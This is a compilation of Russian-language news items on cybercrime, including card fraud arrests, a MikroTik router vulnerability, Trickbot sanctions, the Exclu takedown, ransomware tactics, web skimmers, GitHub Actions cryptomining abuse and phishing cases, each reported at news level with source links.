Выяснилось, что троица успела совершить покупки на сумму более 8000 долларов в одном из магазинов. Однако во втором начались какие-то затруднения с карточками. Их у молодых людей при себе было с избытком. После обысков силовики изъяли 29 кредиток. Помимо этого, у кардеров нашли 44 украденных чека. Все они задержаны без права внесения залога.
source: news.yahoo.com/3-maryland-men-facing-slew-212303721.html
В операционной системе RouterOS, применяемой в маршрутизаторах MikroTik, выявлена критическая уязвимость (CVE-2023-32154), позволяющая неаутентифицированному пользователю удалённо выполнить код на устройстве через отправку специально оформленного анонса маршрутизатора IPv6 (RA, Router Advertisement).
Проблема вызвана отсутствием должной проверки поступающих извне данных в процессе, отвечающем за обработку запросов IPv6 RA (Router Advertisement), что позволило добиться записи данных за границу выделенного буфера и организовать выполнение своего кода с привилегиями root. Уязвимость проявляется в ветках MikroTik RouterOS v6.xx и v7.xx, при включении в настройках получения сообщений IPv6 RA ("ipv6/settings/ set accept-router-advertisements=yes" или "ipv6/settings/set forward=no accept-router-advertisements=yes-if-forwarding- disabled").
Возможность эксплуатации уязвимости на практике была продемонстрирована на соревнованиях Pwn2Own в Торонто, в ходе которых выявившие проблему исследователи получили вознаграждение, размером $100,000 за многоэтапный взлом инфраструктуры с атакой на маршрутизатор Mikrotik и использованием его в качестве плацдарма для атаки на другие компоненты локальной сети (в дальнейшем атакующие получили управление над принтером Canon, сведения об уязвимости в котором также раскрыты).
Информация об уязвимости изначально была опубликована до формирования исправления производителем (0-day), но в настоящее время уже опубликованы обновления RouterOS 7.9.1, 6.49.8, 6.48.7, 7.10beta8 с устранением уязвимости. По информации от проекта ZDI (Zero Day Initiative), проводящего соревнования Pwn2Own, производитель был уведомлен об уязвимости 29 декабря 2022 года. Представители MikroTik утверждают, что не получали уведомления и узнали о проблеме только 10 мая, после отправки финального предупреждения о раскрытии информации. Кроме того, в отчёте об уязвимости упоминается, что информация о сути проблемы была передана представителю MikroTik в личном порядке во время проведения соревнований Pwn2Own в Торонто, но по заявлению MikroTik сотрудники компании не принимали участия в мероприятии ни в каком качестве.
Утверждения властей США о том, что РФ якобы является "тихой гаванью" для киберпреступников, лживы и безответственны, это элемент гибридной войны против Москвы. Об этом говорится в заявлении посла России в Вашингтоне Анатолия Антонова, распространенном в четверг диппредставительством РФ.
Дипломат прокомментировал введение США санкций в отношении членов группировки киберпреступников Trickbot, которая, по версии американской стороны, базируется на территории России. "Это очередной пример огульных обвинений в адрес нашей страны. Складывается впечатление, что у американского казначейства не осталось другой работы, кроме подведения под санкции россиян. Причем делается это топорно - никакой аргументации и доказательств. Судя по всему, здесь пытаются создать видимость борьбы с киберпреступностью перед американскими налогоплательщиками", - подчеркнул Антонов.
"Россия всегда подчеркивала, что победить цифровой криминал возможно лишь сообща. Проведенная нашими спецслужбами по запросу США в январе 2022 года операция по нейтрализации членов крупной хакерской группировки продемонстрировала готовность российской стороны взаимодействовать с Соединенными Штатами в сфере кибербезопасности. Однако Вашингтон заморозил профильный диалог в формате Кремль - Белый дом. Навязываться мы точно не будем", - добавил посол.
"Утверждения же Минфина США о том, что Россия якобы является "тихой гаванью" для киберпреступников, лживы и безответственны. Все это - неотъемлемый элемент развязанной против нас гибридной войны", - добавил Антонов.
"В 2022 году наша страна подверглась беспрецедентным внешним кибератакам. Отражены порядка 50 тыс. хакерских нападений. При этом большинство из них осуществлялось с территории США, - подчеркнул дипломат. - Возникает справедливый вопрос: может быть, это Соединенные Штаты являются тем самым "пристанищем" для киберкриминала?"
Как сообщил в четверг Минфин США, американские власти совместно с британскими вводят санкции против семи членов кибергруппировки Trickbot. Американское финансовое ведомство утверждало, что в РФ Trickbot и другие группировки якобы "свободно осуществляют вредоносную деятельность в киберсфере против США, Соединенного Королевства, союзников и партнеров".
Попадание в санкционный список означает заморозку активов в США и запрет для американских граждан или компаний вести бизнес с его фигурантами.
Полиция Нидерландов сообщила о ликвидации платформы для зашифрованных коммуникаций Exclu. Интересно, что перед закрытием Exclu правоохранители взломали сервис и с его помощью долгое время следили за деятельностью преступников.
Exclu продавал шестимесячные подписки на свое приложение за 800 евро и позволял пользователям обмениваться зашифрованными сообщениями и медиафайлами (голосовыми записями, видео, изображениями). Полиция считает, что у приложения насчитывалось около 3000 пользователей, 750 из которых проживали в Нидерландах.
Эта масштабная операция, в которой также принимали участие Евроюст, Европол, полиция Италии, Швеции, Франции и Германии, состояла из двух отдельных расследований, начавшихся в сентябре 2020 года и апреле 2022 года. В итоге, в начале февраля 2023 года правоохранители провели 79 обысков в Нидерландах, Германии и Бельгии и арестовали 42 человека.
Судя по всему, двое задержанных являлись владельцами и управляющими Exclu, а остальные 40 человек были пользователями сервиса, в том числе операторами нарколабораторий, у которых изъяли большое количество наркотических веществ, огнестрельного оружия, а также более 4,3 млн евро наличными и предметы роскоши.
При этом голландская полиция сообщает, что ее специалистам удалось не только ликвидировать инфраструктуру сервиса, но и взломать Exclu, идентифицировать его пользователей и около пяти месяцев читать их сообщения. Власти подчеркивают, что теперь располагают всеми необходимыми данными для продолжения расследований.
Интересно, что часть пользователей Exclu составляли не преступники, а профессионалы, работающие в различных деликатных областях, включая юристов, следователей, нотариусов и даже врачей, для которых конфиденциальность в работе имела решающее значение. Теперь этим людям советуют обратиться в полицию и запросить удаление их данных с изъятых серверов.
Похоже, закрытие Exclu аналогично ликвидации другой платформы для зашифрованных коммуникаций — Encrochat, которой пользовались более 60 000 преступников по всему миру. Напомню, что в 2020 году правоохранители так же проникли в сеть Encrochat и внедрили на устройства компании малварь, которая позволила читать сообщения преступников, прежде чем те были отправлены.
source: politie.nl/nieuws/2023/februari/3/politie-leest-opnieuw-mee-met- criminelen.html
Вымогатель получил новые функции и теперь представляет большую угрозу для организаций по всему миру.
По данным ИБ-компании Symantec, группировка Coreid (FIN7, Carbon Spider), обновила свою программу-вымогатель Darkside и предлагает более продвинутые возможности своим партнерам.
Программа-вымогатель Darkside приобрела известность в мае 2021 года, когда она была использована в разрушительной атаке на крупнейшую трубопроводную систему США Colonial Pipeline.
В своем отчете Symantec подробно описала актуальные методы Coreid для проведения вымогательских атак на организации. Coreid работает по RaaS-схеме, собирая деньги с аффилированных лиц, которые используют инструменты группы в своих атаках. После того, как инцидент с Colonial Pipeline привлек чрезмерное внимание к Darkside, его создатели переименовали программу в BlackMatter , а затем в Noberus. И именно Noberus представляет большую угрозу благодаря более сложным инструментам и технологиям.
Noberus предлагает 2 разных алгоритма шифрования и 4 режима шифрования. По умолчанию используется прерывистое шифрование для того, чтобы быстро и надежно зашифровать данные, при этом оставаясь незамеченным.
Для извлечения украденных файлов Noberus использует инструмент Exmatter, который, по словам Symantec, предназначен для кражи определенных типов файлов из выбранных каталогов и последующей загрузки их на сервер злоумышленника еще до развертывания программы-вымогателя. Exmatter постоянно совершенствуется и может извлекать файлы через FTP, SFTP или WebDav. Он может создать отчет обо всех эксфильтрованных файлах. Также он может самоуничтожиться, если работает не в корпоративной среде.
Noberus также может использовать инфостилеры для получения учетных данных от ПО для резервного копирования Veeam, продукта для защиты данных и аварийного восстановления, используемого многими организациями для хранения учетных данных контроллеров домена и облачных служб. Вредоносное ПО Infostealer.Eamfo, может подключаться к базе данных SQL, в которой хранятся учетные данные, и красть их с помощью определенного SQL-запроса.
Сейчас Coreid избавляется от партнеров, которые не приносят им достаточную прибыль. Хакеры поощряют только прибыльных клиентов. Любой партнер, который приносит более $1,5 млн., получает доступ к инструментам DDoS-атаки, базам данных телефонных номеров жертв, чтобы связаться с ними напрямую, и бесплатным методам брутфорс-атаки.
source: symantec-enterprise-blogs.security.com/blogs/threat- intelligence/noberus-blackcat-ransomware-ttps
Киберпреступники теперь конкурируют не в сети, а в реальной жизни.
Подросток из Флориды, который работал на банду киберпреступников, специализирующейся на краже криптовалюты, на прошлой неделе был избит и похищен конкурирующей группировкой. Похитители потребовали $200 000 за освобождение подростка. Видео с похищением распространилось в нескольких Telegram каналах, посвященных технике подмены SIM-карты (SIM Swapping).
Подросток под псевдонимом «Foreshadow» работал «держателем» — низкоуровневым членом группы, который выполняет самые рискованные задания. Он играет наименее полезную роль: физическое хранение и управление различными мобильными устройствами и SIM-картами, которые используются в мошенничестве.
Когда видео Foreshadow с заложниками начало распространяться по Telegram каналам, появился слух, что Foreshadow умер от ранения в ногу. Вскоре выяснилось, что Foreshadow живой и он сотрудничает с ФБР, поэтому членов киберпреступного сообщества предупредили, чтобы они удаляли любые сообщения от Foreshadow. Однако, Foreshadow на данный момент не отвечает на сообщения.
Бывший начальник Foreshadow Джарик сказал, что юноша действительно был застрелен похитителями, и обвинил в похищении конкурирующего преступника из Австралии. Конкурент был зол на то, что в предыдущей авантюре с ним поделились долей меньшей, чем было оговорено. Предполагаемый организатор похищения под псевдонимом «Gus» подтвердил, что он заказал похищение Foreshadow, потому что тот скрыл часть украденных средств.
Ранее сообщалось о росте нового преступного направления Violence-as-a-Service (насилие-как-услуга) . Такие атаки начинаются с преступных Telegram-каналов с сотнями и тысячами участников, которые содержат «предложения о работе», представляющие собой задания бросить кирпич в окно или проколоть шины врагов. За некоторые услуги заказчики готовы платить около $3000.
Так, 21-летний мужчина из Нью-Джерси был арестован и обвинен в нескольких атаках, включая стрельбу из пистолета по дому и поджог жилого дома с помощью коктейля Молотова.
Преступная группировка использовала скомпрометированные данные клиентов иностранных банков для расчетов в онлайн-магазинах. Купленные товары фигуранты перепродавали и получали «прибыли».
Киберполицейские Харьковщины в рамках международного сотрудничества разоблачили 40-летнего соорганизатора мошеннической схемы. Гражданин Украины совместно со знакомым получал на хакерских форумах скомпрометированные реквизиты банковских счетов граждан Евросоюза. Используя эти данные, злоумышленники платили различные покупки в интернет-магазинах за счет пострадавших.
Также злоумышленники создавали сайты с предложениями трудоустройства и набирали торговых агентов. С помощью созданной системы администрирования через торговых агентов происходила отправка товаров и обеспечивался дальнейший сбыт товаров в восточноевропейском зарубежье. Вознаграждение члены преступной группы получали на электронные кошельки.
Общая сумма ущерба, нанесенного потерпевшим, достигает более 18 миллионов гривен.
По местам проживания фигуранта сотрудники полиции в присутствии правоохранителей Германии провели обыски. Изъяты компьютерная техника и мобильные телефоны. К проведению следственных действий также были привлечены сотрудники полка полиции особого назначения полиции Киева.
Открыто уголовное производство по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Фигуранту может грозить до восьми лет лишения свободы. Процессуальное руководство осуществляет Офис Генерального прокурора Украины.
Сейчас другой соорганизатор имеет статус обвиняемого в рамках проведения расследования полицейскими Германии, где находится под стражей.
• Source: [https://www.npu.gov.ua/news/kiberzl...upi-zbitki-syagayut- ponad-18-miljoniv- griven/](https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-spilno-z- pravooxoronczyami-nimechchini-vikrila-uchasnika-transnaczionalnoji- shaxrajskoji-grupi-zbitki-syagayut-ponad-18-miljoniv-griven/)
Киберпреступники начали использовать облачный видеохостинг в кибератаках на цепочки поставок. На сайтах сферы недвижимости злоумышленники размещают вредоносный скрипт, ворующий вводимые посетителями данные.
Речь идёт о веб-скиммерах, с помощью которых хакеры часто крадут информацию, заносимую в формы на различных популярных сайтах. Объектами взлома зачастую становятся онлайн-магазины, на которых пользователи привыкли приобретать товары.
На новую кампанию обратили внимание специалисты подразделения Unit42, принадлежащего Palo Alto Networks. По их словам, киберпреступники задействовали облачный видеохостинг для внедрения кода скиммера в видеоплеер.
Таким образом, когда на сайт встраивается упомянутый видеоплеер, с ним автоматически добавляется вредоносный скрипт. В общей сложности исследователи из Unit42 обнаружили более 100 веб-ресурсов, скомпрометированных в рамках этой кампании.
Эксперты уведомили владельцев облачного видеохостинга и помогли убрать вредоносный код с пострадавших сайтов. Однако эти атаки стали очередным напоминанием о находчивости современных киберпреступников.
Как отметили специалисты, затронутая видеоплатформа позволяет создать плееры, в которые может быть включён JavaScript-код для кастомизации. Пострадавшие сайты сферы недвижимости встраивали видеоплеер, который использовал статичный JavaScript-файл, размещённый на удалённом сервере.
Эксперты Unit42 полагают, что злоумышленники получили доступ к файлу и изменили его, добавив вредоносный скрипт веб-скиммера. Злонамеренный код специально обфусцирован, чтобы не вызвать подозрений у пользователей и защитных средств.
В прошлом месяце мы писали о веб-скиммере, который был спрятан в контейнер Google Tag Manager и найден в 316 интернет-магазинах. Эта тактика, по словам специалистов по кибербезопасности, позволяла месяцами скрывать действующий вредонос.
• Source: <https://unit42.paloaltonetworks.com/web-skimmer-video- distribution/>
В компании Евгения Мантурова, которая зарегистрирована 1 октября 2021 года, то есть всего два месяца назад, появились соучредители. Партнерами сына министра промышленности и торговли стали Сихарулидзе Левани (35%), Алексей Соколов (15%) и Дмитрий Зубаха (15%). Последний обвиняется Соединенными Штатами в организации DDoS атак против Ebay, Amazon и Priceline и хищении данных кредитных карт.
На это обратил внимание Telegram-канал «ЧТД». По данным авторов материала, Зубаха с Мантуровым и партнерами создадут международный сервис для спортсменов, который сделает «современной и удобной» организацию соревнований.
По задумке продукт сделает «современными и удобными» все организационные аспекты проведения соревнований — оплату взносов, судейство, анализ результатов и ведение рейтингов спортсменов
Зубаха был арестован в 2012 году на Кипре по обвинительному акту, который выдал суд Западного округа Вашингтона. Окружной суд Пафоса 12 февраля 2013 года принял решение выдать Зубаху в США. Однако затем случился кипрский финансовый кризис, и власти изменили свое решение. В 2013 году он был экстрадирован в Москву, где получил условный срок, хотя на выдачу претендовали правоохранительные органы США.
На момент задержания Зубаха являлся сотрудником российской компании «Ашманов и партнеры», которая развернула масштабную кампанию в его защиту. В то же время некоторые СМИ сообщали, что на решение кипрских властей повлиял Кремль, некоторые писали, что вступилась российская прокуратура.
• Source: https://theins.ru/news/247553
Российский запрос об экстрадиции перевесил американский
Дмитрий Зубаха был задержан в аэропорту кипрского Пафоса 18 июля 2012 года. Формальным поводом к задержанию послужило наличие у кипрских властей ордера Интерпола, инициированного США. Там россиянина подозревают в организации в июне 2008 года кибератак на сайты интернет-магазина Amazon, компании Priceline.com и интернет-аукциона eBay. Также, по данным американцев, Дмитрий Зубаха был причастен к краже в 2009 году персональных данных владельцев кредитных карт граждан США.
По данным комитета по киберпреступности и защите интеллектуальной собственности Минюста США, о причастности Дмитрия Зубахи к этим эпизодам преступной деятельности его сотрудники узнали случайно. Якобы сам Дмитрий Зубаха и его сообщник Сергей Лагашов откровенничали об этом «на одном из закрытых профессиональных хакерских форумов».
История с задержанием Дмитрия Зубахи и попыткой американцев экстрадировать его в США наделала в России немало шума. В августе 2012 года активисты профсоюза граждан России и партии «Новая великая Россия» даже провели у американского посольства в Москве пикет, к которому присоединилась супруга осужденного на 25 лет в США Виктора Бута Алла Бут. Пикетчики потребовали от правительства Кипра немедленного освобождения российского программиста, а от российских властей — «оказания помощи попавшему в беду соотечественнику».
19 сентября 2012 года Генпрокуратура РФ направила в Минюст Кипра запрос о выдаче Зубахи России для привлечения к уголовной ответственности по ч. 4 ст. 158 УК РФ (кража, совершенная группой лиц по предварительному сговору, в особо крупном размере). По версии следователей 4-го управления МВД России, в октябре-декабре 2011 года Дмитрий Зубаха с сообщниками якобы «похитил с расчетных счетов ряда московских организаций более 6 млн руб.».
Добиться выдачи россиянина на родину оказалось непросто, поскольку американцы настойчиво требовали его экстрадиции в США. В результате «тщательного рассмотрения американского и российского запросов» были приняты два взаимоисключающих решения: 12 февраля окружной суд Пафоса признал правомерным запрос американцев, а 20 марта такое же решение, но в пользу запроса России принял окружной суд Никосии. В ходе последующих переговоров россиян с кипрскими властями 5 апреля 2013 года министр юстиции и общественного порядка Кипра принял окончательное решение о выдаче Дмитрия Зубахи России. Еще неделя потребовалась на оформление необходимых документов. В итоге Зубаха самолетом «Аэрофлота» под конвоем сотрудников ФСИН был доставлен на родину.
• Source: https://www.kommersant.ru/doc/2170771
15.04.2013
Хакеры, ворующие платежные данные с помощью веб-скиммеров, начали использовать Google Tag Manager (GTM) для сокрытия своего JavaScript-кода. За девять месяцев исследователи из Gemini Advisory (собственность Recorded Future) обнаружили вредоносные GTM-контейнеры на 316 коммерческих сайтах — в основном небольших.
Менеджер тегов от Google позволяет создавать контейнеры для ресурсов, что облегчает обновление кодов, подключение сервисов и добавление скриптов на сайт (например, с целью сбора аналитики или показа рекламы). В данном случае злоумышленники создают собственный контейнер GTM с вредоносным содержимым и незаметно загружают его на взломанный сайт, а соответствующий тег script внедряют в целевые страницы.
Такая тактика позволяет месяцами скрывать работающий веб-скиммер, так как системы защиты веб-приложений (WAF) редко блокируют трафик, ассоциируемый с GTM, а вручную выловить вредоносный тег среди легитимных затруднительно.
Авторов текущих атак эксперты разделили на две группы — по способу использования GTM. Первая (впервые засветилась в марте) внедряет веб-скиммер непосредственно в контейнер, вторая (действует с мая) помещает его на удаленный сайт, а в контейнере прячет обфусцированный загрузчик.
Первая группа хакеров более активна, на ее долю приходится две трети взломов, зафиксированных Gemini. Домены, используемые ими для аккумуляции краденых данных, имитируют ресурсы Google (имена созданы с использованием тайпсквоттинга либо подмены TLD).
Вторая группировка использует домены двойного назначения — для хранения кода веб-скиммера и вывода краденых данных. За время наблюдений эти хакеры меняли свои хранилища шесть раз.
Обе группы атакуют различные платформы: Magento (в основном версии 2), WordPress, Shopify, BigCommerce. Сайты-жертвы — как правило, магазины с небольшим трафиком, меньше 50 тыс. посещений в месяц.
Краденые платежные данные впоследствии выставляются на продажу в даркнете. На одном из таких маркетплейсов исследователи обнаружили финансовую информацию 88 тыс. шоперов, похищенную в рамках текущей кампании.
Криминальные группировки, полагающиеся на веб-скиммеры (эксперты обычно объединяют их под общим именем Magecart), постоянно совершенствуют свои техники и тактики. Так, недавно одна из таких групп начала внедрять на серверы троянские программы удаленного доступа (CronRAT, NginRAT), позволяющие подключать скрипт для кражи платежных данных на лету.
• Source: https://geminiadvisory.io/magecart-google-tag-manager/
Издание The Record сообщает, что на прошлой неделе голландский суд приговорил 27-летнего жителя города Арнем к 27 месяцам тюремного заключения и штрафу в размере 10 000 евро за взлом 13 762 учетных записей в местных интернет- магазинах.
Мужчина, чье имя не разглашается, был признан виновным в покупке 3 700 000 учетных данных и использовании автоматизированных инструментов для перебора этих логинов и паролей. В итоге он успешно получил доступ почти к 14 000 аккаунтов и использовал финансовые данные, связанные с этими учетными записями, для покупки предметов роскоши, которые затем отправлял на свой домашний адрес.
Журналисты отмечают, что вынесенный приговор является одним из наиболее строгих за преступления, связанные с захватом аккаунтов, за всю историю Нидерландов. Судья приговорил взломщика к 27 месяцам тюремного заключения, а это близко к 30 месяцам тюремного заключения, на которых изначально настаивало обвинение.
Издание напоминает, что, по данным «Лаборатории Касперского», каждая вторая мошенническая транзакция связана с захватом чужого аккаунта. Более того, доля таких инцидентов увеличилась с 34% в 2019 году до 54% в 2020 году, то есть возросла на 20%, когда люди стали больше полагаться на покупки в интернете из- за пандемии коронавируса (COVID-19).
[](https://xakep.ru/wp- content/uploads/2021/04/345223/types-of-fraud-related-events.png)
Источник: xakep.ru/2021/04/06/dutch-ato/
Голландский ИБ-специалист Джастин Пердок (Justin Perdok) обнаружил, что по меньшей мере один хакер злоупотребляет CI/CD функцией GitHub Actions, чтобы заставить серверы компании добывать криптовалюту. Похоже, такие атаки никак не вредят проектам пользователей, зато создают огромную нагрузку на инфраструктуру GitHub.
Интересно, что Пердок был не первым, кто заметил такие атаки, он лишь привлек внимание к проблеме: первым их обнаружил французский исследователь, известный как Tib, который писал, что атаки начались еще в ноябре 2020 года и продолжаются до сих пор.
Пердок рассказывает, что всё строится на создании форка легитимного репозитория, добавлении вредоносных GitHub Actions к исходному коду, а затем отправке Pull Request для слияния кода обратно с оригиналом.
При этом хакер не полагается на удачу, то есть владелец исходного проекта вовсе не должен утвердить этот вредоносный Pull Request. Пердок говорит, что для атаки достаточно и самого факта отправки Pull Request. Так, по информации специалиста, злоумышленники специально выбирают мишенями владельцев репозиториев, которые используют автоматизацию рабочих процессов, то есть проверяют входящие Pull Request с помощью автоматизированных заданий.

В итоге, после отправки вредоносного запроса системы GitHub обрабатывают код злоумышленника и запускают виртуальную машину, которая загружает и запускает софт для майнинга криптовалюты в инфраструктуре GitHub. Эксперты Bleeping Computer рассказывают, что майнер маскируется под npm.exe и связывается с пулом turtlecoin.herominers.com.

Пердок пишет, что и сам стал жертвой злоумышленников и наблюдал, как те использовали до 100 майнеров в рамках всего одной атаки.

Эксперт полагает, что хакеры действуют случайным образом и с большим размахом. Так, он идентифицировал по крайней мере одну учетную запись, создающую сотни Pull Request с вредоносным кодом.
Представители GitHub уже сообщили СМИ, что им известно о происходящем, и они активно расследуют эти майнинговые злоупотребления. Впрочем, такой же ответ в компании дали и французскому инженеру в прошлом году.
Судя по всему, пока компания борется с хакером, блокируя его учтенные записи, однако злоумышленник просто регистрирует новые, как только старые обнаруживают и банят.
Хуже того, Bleeping Computer сообщает, что после публикации данных об этих атаках в сети появились подражатели, злоупотребляющие такими же методами и использующие инфраструктуру GitHub для майнинга. К примеру, один из подражателей отправил более 50 вредоносных запросов легитимными репозиториями. По данным издания, подражатели используют опенсорсный майнер XMRig и не стесняются загружать его прямо из официального репозитория на GitHub.

Источник: xakep.ru/2021/04/05/github-actions-mining/
Запущенный в прошлом году криптовалютный обменник KeepChange сообщает, что пострадал от хакерской атаки. Администрация ресурса уверяет, что взлом удалось вовремя остановить, так что средства пользователей не пострадали, но, увы, того же нельзя сказать о личных данных.
«С клиентских счетов были инициированы запросы на вывод биткоинов на адрес, принадлежащий злоумышленникам. Одна из наших подсистем управления сработала и остановила эти запросы, так что ни один биткойн с KeepChange не был украден», — гласит заявление компании.
Click to expand...
Но биржа предупреждает, что хакерам все же удалось похитить личные данные клиентов, включая имена, адреса электронной почты, информацию о количестве и суммах сделок, а также хешированные пароли.
В итоге администрация KeepChange настоятельно рекомендует пользователям сменить пароли и подключить двухфакторную аутентификацию. Ради этого до 11 февраля был приостановлен вывод средств с платформы. В это время KeepChange принудительно включила функцию безопасности Named Login Guard для всех пользователей: они не смогут получить доступ к своим учетным записям, пока не откроют ссылку для подтверждения, полученную по электронной почте.
Пока представители KeepChange не сообщают, кто мог стоять за этой атакой, так как компания все еще занимается расследованием инцидента.
Источник: xakep.ru/2021/02/12/keepchange/
Специализированным следственным отделом по расследованию преступлений, совершенных с использованием информационно-телекоммуникационных технологий СУ Управления МВД России по городу Ставрополю завершено расследование уголовного дела, возбужденного по признакам преступления, предусмотренного ч. 2 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации».
Противоправное деяние выявлено и пресечено сотрудниками Управления уголовного розыска ГУ МВД России по Ставропольскому краю совместно с коллегами из УФСБ региона.
В ближайшее время на скамью подсудимых отправится 41-летний житель Ставрополя. Используя на персональном компьютере специальное программное обеспечение, мужчина получил доступ к логинам и паролям сотрудников одного из крупных интернет-провайдеров. Полученные данные он применил для входа на сервер, где смог сменить свой тарифный план и регулярно начислять себе бонусы в личном кабинете. Таким образом мужчина на протяжении четырех лет пользовался возможностью бесплатно выходить в сеть Интернет.
В отделе внутренних дел обвиняемый в содеянном сознался.
В настоящее время расследование завершено. Материалы уголовного дела с утвержденным обвинительным заключением направлены в Промышленный районный суд города Ставрополя для рассмотрения по существу.
Сбербанк помог пресечь деятельность преступной группы, участники которой организовали типографию по выпуску поддельных киргизских ID-паспортов для оформления по ним банковских карт. Об этом CNews сообщили представители Сбербанка.
По заявлению банка ГУ МВД России по Москве возбудило уголовное дело по признакам преступления, предусмотренного ч. 2 ст. 187 УК РФ («Неправомерный оборот средств платежей»). Благодаря совместной работе сотрудников Сбербанка и органов внутренних дел была установлена личность и местонахождение преступника.
В результате организатор преступления (гражданин России) был арестован. У него изъято более 700 поддельных ID-паспортов граждан Республики Киргизии, оборудование для их изготовления, деньги, средства связи, банковские карты и многое другое. Ведется следствие, сотрудники банка помогают правоохранителям установить все эпизоды противоправной деятельности ОПГ.
Станислав Кузнецов, заместитель председателя правления Сбербанка: «Уже не первый раз наше тесное взаимодействие с органами внутренних дел способствует ликвидации организованной преступности. На этот раз мы пресекли деятельность преступной группы, выпускавшей поддельные ID-паспорта граждан Республики Киргизия для получения по ним банковских карт. Платежные средства могли в дальнейшем использоваться злоумышленниками для организации мошеннических схем в отношении российских граждан. Уже понятно, что задержанный действовал в промышленных масштабах, и сейчас мы продолжаем оказывать правоохранительным органам максимальное содействие, чтобы выявить все детали совершенных преступлений».
Девятнадцатилетнего жителя Львова, который мошенническим способом выманил у граждан более 100 тысяч гривен, разоблачили оперативники Управления противодействия киберпреступлениям во Львовской области совместноз следователями отдела полиции № 1 Львовского районного управления полиции № 1 и сотрудниками службы безопасности банка, под процессуальным руководством Галицкой окружной прокуратуры.
Как установили правоохранители, злоумышленник создавал в сети Интернет фишинговые сайты различных правительственных и банковских учреждений, рассылал от их имени письма клиентам и в дальнейшем, получив их персональные данные и доступ к банковским счетам, переводил средства на свои счета.
Правоохранители задокументировали три эпизода противозаконной деятельности подозреваемого, который таким образом завладел средствами потерпевших на общую сумму более 112 тысяч гривен.
Следователи сообщили злоумышленнику о подозрении в совершении уголовных правонарушений, предусмотренных ч.4 ст.190 (Мошенничество) Уголовного кодекса Украины и ч.2 ст.15 - ч.4 ст.190 (Покушение на мошенничество) Уголовного кодекса Украины. Максимальное наказание, которое грозит подозреваемому - лишение свободы на срок до восьми лет.
Досудебное расследование продолжается, правоохранители устанавливают личности других злоумышленников, причастных к совершению этих преступлений.
Расследование раскрыло подробности масштабной аферы с криптовалютой.
В совместном расследовании издания 404 Media с независимым аналитическим центром Court Watch была обнаружена масштабная схема кибермошенничества, затронувшая более 500 пользователей криптовалютной биржи Coinbase на сумму свыше $20 млн.
Шаблон аферы
Риккардо, одна из жертв мошенников, столкнулся со взломом своего аккаунта на Coinbase в 2021 году. При попытке входа на платформу для трейдеров Coinbase Pro, он столкнулся с сообщением о компрометации своего аккаунта и необходимости немедленно связаться с сервисной службой по телефону. Мошенники убедили Риккардо ввести код верификации, отправленный по SMS, в чате на поддельном сайте, который выдавал себя за Coinbase, что привело к краже средств.
По данным расследования, мошенники использовали фишинговые сайты, включая coinbasepro[.]com, для перенаправления жертв на поддельные страницы Coinbase.
Фишинговая страница, на которую перешел Риккардо (сверху) и поддельная форма входа и чат с поддержкой (снизу)
Преступник из Индии арестован
Чираг Томар, 30-летний гражданин Индии, был арестован Секретной службой США
(United States Secret Service, USSS) в рамках этого дела. Томар
предположительно является одним из участников схемы, хотя неясно, был ли он
тем, кто разговаривал с Риккардо по телефону.
Каждая кража, указанная в письменных показаниях, оставила после себя цифровые следы, за по которым следователи USSS могли отследить преступников. После того, как украденные средства жертвы были переведены на счет Binance, следователи получили ордер на «обыск» адреса электронной почты, связанного с этой учетной записью. Email-адрес содержал документы, удостоверяющие личность, которые использовались для проверки Binance и были отправлены по электронной почте с другого адреса (chirag.tomar). Офицеры считают, что документы были украдены или получены обманным путем.
Внутри обнаруженной почты (chirag.tomar) находились txt-файлы, содержащие номера телефонов, имя и сумму украденных средств жертв. Информация из почтового ящика помогла идентифицировать подозреваемого. Данные включали несколько фотографий его индийского паспорта, банковские выписки на его имя и фотографии, отправленные как часть его заявления на поездку в США.
Следователи сравнили фотографию на туристической визе Томара в США с фотографиями в аккаунте электронной почты и подтвердили, что это один и тот же человек. В своем заявлении на визу Томар использовал определенный номер телефона, который власти затем связали с конкретной учетной записью на криптовалютной бирже MEXC под вымышленным именем. Следователи полагают, что использование вымышленного имени в MEXC свидетельствует о попытке скрыть истинную личность владельца счета и запутать характер и источник криптовалютных транзакций. Однако офицеры проследили перемещение некоторых украденных средств на счет MEXC, несмотря на то что Томар якобы совершал chain-hopping («прыжки между сетями»), когда он в короткий промежуток времени несколько раз конвертирует одну криптовалюту в другую на разных криптобиржах, чтобы запутать следы.
Разносторонняя деятельность
Расследование освещает широкий спектр действий мошенников, включая кражу криптовалюты, попытки отмывания денег через аккаунты, зарегистрированные на поддельные личности, и перевод средств в другие виды криптовалюты. В документах суда также упоминаются другие жертвы, потерявшие сотни тысяч долларов, в том числе один из пользователей, потерявший более $250 000.
Сервис Coinbase, сотрудничая с правоохранительными органами, заявил о приоритете безопасности пользователей и использовании аппаратных ключей для верификации вместо кодов, которые могут быть перехвачены. Компания также получила контроль над доменом coinbasepro[.]com в июне 2022 года, спустя почти 2 года после начала фишинговой атаки.
Риккардо, потерявший свои средства и обратившийся в ФБР и Coinbase, остался потрясен произошедшим. Мошенники, действующие анонимно и безнаказанно, продолжают представлять серьезную угрозу в мире криптовалют.
sc: documentcloud.org/documents/24351804-chirag-tomar-coinbase- phishing?ref=404media.co
Корпорация Kyocera AVX Components (KAVX) рассылает уведомления об утечке данных, в результате которой была раскрыта личная информация 39 111 человек в результате атаки программы-вымогателя.
KAVX — американский производитель передовых электронных компонентов, дочерняя компания японского полупроводникового гиганта Kyocera. В компании работают более десяти тысяч специалистов, а годовой доход составляет 1,3 миллиарда долларов.
В уведомлении о нарушении данных, направленном пострадавшим людям, KAVX сообщает, что 10 октября 2023 года он обнаружил, что хакеры получили доступ к его системам в период с 16 февраля по 30 марта 2023 года. «30 марта 2023 года KAVX столкнулся с инцидентом кибербезопасности, затронувшим
серверы, расположенные в Гринвилле. и Миртл-Бич, Южная Каролина, США, что привело к шифрованию ограниченного числа систем и временному прекращению работы некоторых служб», — говорится в уведомлении.
«Позже KAVX обнаружила, что данные, содержащиеся на затронутых серверах, включали личную информацию отдельных лиц по всему миру», — отмечает компания.
После внутреннего расследования, направленного на определение того, какая информация была раскрыта, KAVX подтверждает, что она включает как минимум полные имена и номера социального страхования (SSN). Возможно, были раскрыты и другие подробности, но соответствующий раздел образца уведомления подвергнут цензуре.
KAVX заявляет, что не располагает доказательствами того, что киберпреступники злоупотребляли украденными данными, но напоминает получателям писем о связанном с этим риске кражи личных данных и мошенничества, призывая их быть осторожными.
